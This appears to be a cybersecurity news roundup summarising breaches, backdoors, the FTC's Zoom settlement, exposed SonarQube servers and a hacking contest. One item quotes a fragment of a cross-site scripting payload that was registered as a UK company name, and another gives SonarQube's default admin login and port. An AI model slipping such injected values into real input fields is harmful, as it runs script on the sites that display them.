Inrupt launches enterprise privacy platform

In 2017, Tim Berners-Lee launched a company called Inrupt to market products that used the open-source Solid system. Monday, Inrupt announced an enterprise product to let developers  build apps that use Solid’s Personal Online Data Stores, or Pods. These are meant to give users explicit consent and control over personal data. Inrupt’s enterprise platform uses a Solid Server to manage the Pods, while providing an SDK to let developers access the data in the Pods for specific uses. Inrupt worked with the BBC, the UK’s National Health Service and the Government of Flanders in Belgium to develop its enterprise platform. 

(TechCrunch)

India’s Bigbasket confirms cyberattack

Co-founder and CEO Hari Menon confirmed the attack, which stole personal information of millions of Indian users. Information exfiltrated includes email addresses, mobile phone numbers, and full addresses. Security researchers at Cyble initially reported the attack and spotted the information for sale on the dark web. Experts warn that the leaked data could be used to target phishing attacks. Bigbasket is based in Bangalore, which currently has eight cybercrime units. However these units are headed by police inspectors and staff often lack training to investigate many types of online attacks. 

(Bloomberg)

What’s in a name? Turns out malware

A British software engineer thought it would be funny to name his company after a cross-site scripting attack, so he named it SCRIPT SRC=HTTPS://MJT.XSS.HT LTD with all the appropriate quotation marks and brackets. Most importantly the name of the company began with a quotation mark and an end tag. That meant any site handling the name of the company needed to handle HTML properly or it would end up executing the script. That would just end up executing a script from XSS hunter which helps developers find cross-site scripting errors. The name was registered with Companies House, which registers business names in Britain. The director of the company however found out that it was actually causing some minor issues, so he contacted Companies House and the UK’s National Cyber Security Centre and did not disclose the issue to anyone else. The company’s name has been changed to THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD

(The Guardian)

FTC reaches settlement with Zoom

The US Federal Trade Commission announced it reached a settlement with Zoom over “a series of deceptive and unfair practices that undermined the security of its users.” The FTC was specifically investigating Zoom’s claims that it used end-to-end encryption, when in fact the company stored cryptographic keys that could allow them to view customer meetings. The FTC also found that Zoom stored unencrypted meeting recordings and was critical of Zoom’s practice of covertly installing a web server to speed meeting connections. Zoom has pushed out an update to remove the web server and started to roll out end-to-end encryption. The settlement forbids Zoom from misrepresenting its security and privacy practices going forward, with Zoom also launching a vulnerability management program. 

(TechCrunch)

Thanks to our sponsor, Blumira

The shift to cloud-based productivity and collaboration tools is a necessity and reality for many CISOs these days – but visibility into cloud threats can be challenging with limited staff and resources. Automating your security operations workflow is easier with Blumira’s detection and response platform. Integrate Office 365 with Blumira to start realizing security value in a matter of hours with a free 14-day trial at Blumira.com.

PowerShell backdoors discovered in Microsoft Exchange attack

Two new Powershell exploits were discovered by security researchers at Palo Alto Networks in an attack by the xHunt threat group against an organization in Kuwait. Researchers have named the backdoors “TriFive” and “Snugy”, with both using “covert channels for C2 communications, specifically DNS tunneling and an email-based channel using drafts in the Deleted Items folder of a compromised email account.” The attacks were first seen in September, although researchers are unsure how the attackers gained initial access to the Exchange server. 

(ThreatPost)

FBI warns of misconfiguration causing stolen source code repositories

The source code management tools from SonarQube are the root cause, with intrusions dating back to April 2020 and impacting government agencies and private companies. The FBI sent out a private notice to parties last month before going public this week. SonarQube apps are installed on web servers that are connected to code hosting systems to allow for web-based code testing. However many organizations were running the apps with default settings, with “admin” as the login and password running on port 9000. Going all the way back to 2018, security researcher Bob Diachenko noted that 30-40% of SonarQube systems online had no authentication systems in place. The FBI recommends not using the defaults to avoid stolen code. 

(ZDNet)

Compal Electronics hit with ransomware

The Taiwanese ODM suffered the attack over the weekend. According to a leaked ransom note, the DoppelPaymer ransomware gang was behind the attack. By the time it was discovered on November 8th, 30% of endpoints were infected with the ransomware, causing Compal to shut down its network to avoid further spread. Compal is the second largest contract laptop manufacturer behind Quanta, but said its production lines were unaffected. The company refuted media reports that it was being blackmailed with a potential data leak by the attackers.

(Security Affairs)

China’s top hacking contest claims Windows 10, iOS,  and Chrome

The third edition of Tianfu Cup saw 15 hacking teams participate, each getting three 5-minute tries to breach their selected target with an original exploit. A team from Qihoo 360 accounted for almost two-thirds of the entire prize pool, going home with $744,500 of the total $1,210,000 awarded this year. Other successfully breached targets include Adobe PDF, Ubuntu, Docker, VMware ESXi, and TP-Link router firmware. Patches for all exploits are expected to be released in the coming days. 

(ZDNet)